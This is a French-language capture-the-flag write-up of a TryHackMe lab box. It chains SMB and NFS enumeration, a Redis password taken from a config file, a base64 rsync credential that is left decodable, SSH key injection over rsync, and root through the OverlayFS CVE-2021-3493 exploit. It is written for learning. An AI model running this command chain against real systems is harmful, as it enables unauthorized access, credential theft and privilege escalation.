VulnNet Entertainment learns from its mistakes, and now they have something new for you…
VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.
Enumération
Énumération avec nmap dans 1ier temps (en mode bourrin…)
nmap -T5 -p- 10.10.57.62
Beaucoup de ports ouvert, mais pas de page web disponible. On va d’abord faire une énumération sur SMB avec enum4linux
enum4linux 10.10.57.62
On a un partage de disponible que l’on peut mapping et listing.
Connexion au partage SMB:
smbclient \\\\10.10.57.62\\shares
Récupération de tous les fichiers avec la commande mget *
Aucune information n’est intéressante mise à part le fichier serices.txt qui contient le 1ier flag.
- What is the services flag? (services.txt)
Redacted
Enumeration sur NFS:
showmount -e 10.10.57.62
résultat :
Export list for 10.10.57.62:
/opt/conf *
mkdir mnt
mount -t nfs 10.10.57.62:/opt/conf mnt
Il faut énumérer tous les fichiers présent dans le partage, en gros regarder dans chaque fichier à la mano…
Finalement, dans le dossier redis/redis.conf on trouve un mot de passe.
C’est la 1ier fois que je rencontre le service redis, donc je découvre et j’ai dû chercher à droit et à gauche pour récupérer des informations. J’ai trouvé ce site qui m’a pas mal aidé.
En 1ier lieu, j’ai l’ai installé comme ceci (ça n’installe que redis-cli) :
apt install redis-tools
Énumération :
redis-cli -h 10.10.57.62 info
Réponse :
NOAUTH Authentication required.
Ok, pas grave on a le mot de passe
Même commande, mais avec l’option -a pour l’authentification :
redis-cli -h 10.10.57.62 -a ‘redacted’ info
Avec la version 4.0.9, on peut faire des recherches sur Google, mais les exploits trouvés ne semble pas collés.
https://www.exploit-db.com/exploits/47195
https://www.exploit-db.com/exploits/44904
On continue l’énumération :
10.10.57.62:6379> keys *
1) « tmp »
2) « marketlist »
3) « internal flag »
4) « authlist »
5) « int »
10.10.57.62:6379> get « internal flag »
« redacted »
10.10.57.62:6379> type authlist
list
10.10.57.62:6379> lrange tmp 1 100
1 « QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== »
2 « QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== »
3 « QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== »
Information trouvé sur le site lzone.de
base64 decode
echo ‘QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==’ | base64 -d
Résultat:
Authorization for rsync://rsync-connect@127.0.0.1 with password redacted
Enumération rsync
Avec le nom du répertoire récupérer « files » on va lister les informations avec cette commande :
rsync -av –list-only rsync://10.10.57.62/files
Ensuite, on va les récupérer dans un dossier rsync qu’on vient juste de créer :
rsync -av rsync://rsync-connect@10.10.57.62/files rsync/
Il n’y a rien dans les différents dossiers d’intéressants (mise à part le flag user), et comme d’habitude, il faut toujours voir si on la possibilité de transférer une clé SSH.
Création d’une paire de clés SSH avec ssh-keygen
Transfert de la clé via rsync :
rsync -avzh ./id_rsa.pub rsync://rsync-connect@10.10.57.62/files/sys-internal/.ssh/authorized_keys –inplace –no-o –no-g
Escalade de privilège
Une fois connecté en SSH, il faut effectuer une énumération locale avec linpeas
On récupère ainsi la version du kernel et de la distribution
La version d’Ubuntu est vulnérable a cet exploit OverlayFS – CVE-2021-3493 . Il existe une box sur TryHackMe qui permet de tester l’exploit.
Il faut copier l’exploit sur la box via python http-server/wget, le compiler
gcc exploit.c -o exploit
changer ses droits d’exécution :
chmod +x exploit
et exécuter l’exploit :
./exploit
#
